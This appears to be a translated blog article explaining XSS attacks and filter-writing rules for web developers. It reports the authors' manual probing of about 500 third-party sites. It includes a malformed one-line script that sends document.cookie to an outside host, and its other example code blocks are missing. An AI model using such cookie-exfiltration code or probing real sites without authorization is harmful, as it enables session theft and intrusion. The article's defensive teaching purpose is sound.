What is xss attack?
This is a type of attack that injects malicious code into web systems, forcing it to display modified data, replace links (visible / hidden) or display its own advertisements on the affected resource.
There are two directions of attacks:
Passive – which require the direct intervention of the subject of the attack. The point is to force the victim to follow a malicious link to execute the “malicious code”. This type of attack is more difficult to implement, because it is necessary to have not only technical, but also psychological knowledge.
ActiveIs a type of attack when a hacker tries to find a vulnerability in a website filter. How is such an attack implemented? Everything is very simple. It is necessary to create such a request using a combination of tags and symbols so that the site understands it and executes the command. As soon as a security hole is found, a “malicious code” can be inserted into our request, which, for example, will steal cookies and send them to a convenient place for us. Here is an example of a script that steals cookies from a website:
Img = new image() Img.src = http://site.gif?+document.cookie;
You usually have to work hard to find a security hole in your site, as most filters are robust enough. But people write them, and they tend to make mistakes.
Where and why do such vulnerabilities arise, which lead to catastrophic consequences? It’s all about the attentiveness and knowledge of people. Developers must write correct code, so in this section we will discuss the minimum security rules for writing websites.
We have already described how the attack is applied, but we will repeat it again. The whole point of the xss attack is to detect a hole in the filter in order to bypass it.
1. One of the very first and basic rules for a developer is the use of any (even the most minimal) filter.
In our study of sites, almost all of them were protected, but still there were those that did not use any filtering of the received data. This is mainly found on sites written in PHP. But, for example, python frameworks such as: flask or Django already have built-in minimal filters, it only remains to strengthen them.
2. Filtering symbols and nested structures.
3. The filter should take into account all possible combinations of characters.
One of our favorite xss vulnerability checks is the use of open and closed parentheses.
We write a command with n-th number of brackets. The filter sees this and tries to close them, but the nested code is executed. In this query, we not only check the filter for a different number of parentheses, but also see how the filter will react to different characters, whether it will block or pass them. Let’s pay your attention to the construction at the end of the example. We pass the script as an argument in parentheses. A fun way to test your filter. In our study, many sites did not filter this type of attack, being at risk.
4. Using tags.
Suppose you are filtering both symbols and layered constructs. But there is another vulnerability, it is associated with the img, bb, url tags. These tags have many parameters, including dynsrc and lowsrc, which contain javacsript. These tags must be filtered without fail. If you are not going to use pictures on the site, it is better to disable them altogether.
Unfortunately, simple tag filtering is not enough, you need to take into account the possibility that an attacker will place additional characters inside the tag, which must also be filtered.
When constructing a filter, one must first of all consider the possibility of encoding attacks. There are a large number of encoder programs that will encrypt an attack so that the filter cannot recognize it. Therefore, it is imperative to use the decryption algorithm in the filter before the program executes the request code.
Here is an example of the encrypted code:
Encryption is necessary not only to bypass the filter, but also for social engineering, deceiving people. You can send the encrypted code as a link. It is unlikely that someone will check it, hence another point follows.
6. Social Engineering It is
not enough to write a filter resistant to attacks; it is necessary to periodically hold lectures with employees about the rules for using the Internet and talk about possible tricks of hackers.
A couple of basic rules: never open suspicious links and check encrypted ones, especially if you are a hosting or network admin.
How seriously do developers take the security of their web applications? Our team decided to check it out. As part of our research, we examined about 500 sites for security errors. A lot of time was spent on collecting, processing and structuring information. All checks were carried out manually, because we did not find the necessary tool, and there was not enough time and knowledge to write our own software. But, already having experience, next time we will do just that.
It is worth mentioning that we only checked the filters, this does not violate the legislation (272-274 of the Criminal Code) of the Russian Federation and does not bear any punishment.
We were able to bypass about 11%, having only average knowledge in this area. This is a huge drawback on the part of the developers, which can bring a lot of harm to the project, because the personal data of users comes under attack. According to the law (article 13.11 of the Administrative Code, part 6), all sites must ensure the safety of personal data when storing material media and exclude unauthorized access to them. If this resulted in illegal access to personal data (destruction, modification, copying, blocking, etc.), a fine of 700 rubles to 50,000 rubles should be imposed.
Most of the sites are well protected from attacks, which is good news for us as users. The result of the study is clearly demonstrated in the diagram below.